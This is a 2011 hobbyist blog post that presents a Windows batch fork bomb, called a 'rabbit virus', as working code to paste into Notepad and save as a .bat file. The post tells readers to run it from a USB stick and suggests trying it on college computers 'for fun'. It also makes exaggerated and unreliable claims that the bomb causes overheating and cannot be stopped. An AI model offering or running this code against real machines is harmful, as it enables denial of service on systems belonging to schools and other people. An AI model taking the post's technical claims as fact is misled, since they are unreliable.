Tuesday, 8 March 2011

rabbit viruse a.k.a fork bomb

A rabbit virus opens an application for example cmd.exe so many times that its overloads the computers processor which results in the computer either overheating, shutting down or in some cases you can get a BSOD (blue screen of death). 
Unlike little batch viruses like the shutdown one you cannot stop a fork bomb unless you extremely 1337 so once it starts it goes until it does its job.
Most Anti-Virus software will not pick a fork bomb or rabbit virus, as far as its concerned its just a batch file that opens an application.
THE CODE 
Ok this is the code that you type into notepad and save it as a .bat.
code block should be formatted like this ->
:s
START %0
GOTO :s



to try this copy the code in usb n run the bat file
as soon as fork executes plug out the usb b4 it crashes the system....


or try on your college computers


have fun

No comments:

Post a Comment